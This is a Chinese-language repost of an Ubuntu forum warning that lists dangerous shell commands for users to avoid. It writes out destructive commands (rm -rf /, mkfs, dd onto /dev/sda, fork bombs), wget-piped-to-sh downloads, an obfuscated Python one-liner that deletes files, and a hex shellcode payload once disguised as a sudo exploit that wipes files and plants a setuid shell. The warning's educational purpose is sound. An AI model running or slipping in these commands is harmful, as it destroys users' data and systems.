Ubuntu公布一系列“危险命令”
Ubuntu在论坛公告区公布了一份”危险命令“黑名单,提醒所有用户注意不要随意使用名单内所提到的包含危险性的命令.
这些危险命令包括删除文件夹,写磁盘重要区域,创建分区,导致系统过于繁忙等等.
这些命令分别为:
Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
引自www.zhuceji.org
rm -rf /
rm -rf .
rm -rf * 引自www.zhuceji.org
Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
mkfs mkfs.ext3 mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
本文来自注册机之家
any_command > /dev/sda dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
:(){:|:&};: 本文来自注册机之家
In Perl
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory
Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source
Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
引自www.zhuceji.org
wget http://some_place/some_file sh ./some_file
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.
Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!
For example, 30 seconds in Python yields something like this:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))' 本文来自注册机之家
Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.
文章评论
共有 0位注册机之家成员发表了评论 查看完整内容